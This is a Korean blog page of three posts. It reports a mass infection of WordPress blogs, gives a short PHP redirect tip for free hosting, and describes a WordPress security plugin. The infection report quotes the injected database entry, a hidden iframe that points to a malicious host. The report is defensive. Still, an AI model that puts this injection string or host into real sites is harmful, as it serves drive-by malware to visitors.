워드프레스(WP, WordPress)는 외국에서 개발되어 제공되는 설치형 블로그 툴입니다. 설치형이지만, 이미 몇몇 회사에서는 Saas 형식으로 서비스되고 있으며, 국내에서도 한 곳에서 서비스 중에 있습니다.

최근, 워드 프레스로 구현된 블로그 수백여개에서 데이터베이스가 손상되는 문제점이 발견되었습니다. 공격으로 인한 피해가 최신 버전의 WP에서도 발견된 것으로 알려져 있습니다.

삽입된 코드는 SQL Injection 공격의 대표적인 유형인 <iframe>이 포함되어 있는 것으로 보아 SQL Injection 취약점을 통해 공격한 것으로 추측됩니다. 그리고, 관리자페이지(~/wp-admin/)에 로그온이 제대로 되지 않는 문제점이 보여집니다.

(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),

공격 당한 사이트 URL: hxxp://networkads.net/grep/

한편, 아직 공격당한 지점(Entry Point)를 알아 내지 못하고 있으며, 임시로 DB에 주입된 문자열을 제거하는 수밖에는 없다고 합니다.

출처: http://blog.sucuri.net/2010/04/mass-infection-of-wordpress-blogs-at.html

PS: 보안 제품(안티바이러스)가 설치되지 않은 경우에는 공격 당한 사이트에 방문하면 큰일납니다. 참고로, 어베스트!에서는 잡아내므로 안심해도 됩니다.

PS: 해당 문제의 원인은 관리 페이지의 권한 문제였습니다.

끝.
reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus
    파란닷컴(paran.com)에서는 개인에 한해 무료 웹호스팅을 제공합니다. 제공하는 사양은 다음과 같습니다.


    FTP 클라이언트를 이용하여 파란닷컴 호스팅 계정을 접속하게 되면, /public_html 폴더를 볼 수 있으며, 이 폴더 아래에 개발한 웹소스를 업로드하게 됩니다.

    하지만, 여러 개의 웹사이트 소스를 업로드하고 이중 하나의 소스를 기본적으로 보이게 하려면 다음과 같이 index.html 파일을 작성하여 업로드합니다.

    <?
     header("Location: /wordpress/");
    ?>
    (주: 위의 예에서는 워드프레스를 설치한 폴더로 자동으로 리디렉트하게 됩니다)

    감사합니다.
    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus
      캐나다의 온타리오에 위치한 SSM(http://SiteSecureMonitor.com) 회사는 유명한 블로그 솔루션인 워드프레스(WP, WordPress)에서 악성 프로그램의 감염을 예방할 수 있는 플러그인을 공개했습니다.

      이 플러그인은 워드프레스 공식 플러그인 디렉터리에서 다운로드할 수 있으며, 주요 기능은 다음과 같습니다.

      • 일반적인 보안 검사
      • WP를 최신 버전으로 업그레이드
      • 기한이 만료된 플러그인 검사
      • WP 블로그의 취약점 위험 감소
      • 로그인 페이지의 오류 메시지 제거
      • WP 버전 정보 숨기기(홈페이지, 대시보드)
      • 디렉터리 탐색 예방
      • 윈도우 라이브 라이터 차단
      • 코어 업데이트 정보 제거
      • 플로그인 업데이트 정보 제거
      • 테마 업데이트 정보 제거
      • WP의 보안 향상
      • 플러그인 디렉터리를 위한 index.php 파일 추가
      • 플러그인 폴더 숨기기
      • 관리자의 ID(admin) 변경
      • wp-config.php, wp-includes 폴더, wp-content 폴더 접근 권한 제한
      • wp-admin 폴더에 접근할 수 있는 IP 제한
      • SSM으로부터 무료 악성 프로그램 검사 제공

      자세한 사항은 아래 링크를 참고하십시오.

      플러그인: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/

       



      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus


        Web Analytics Blogs Directory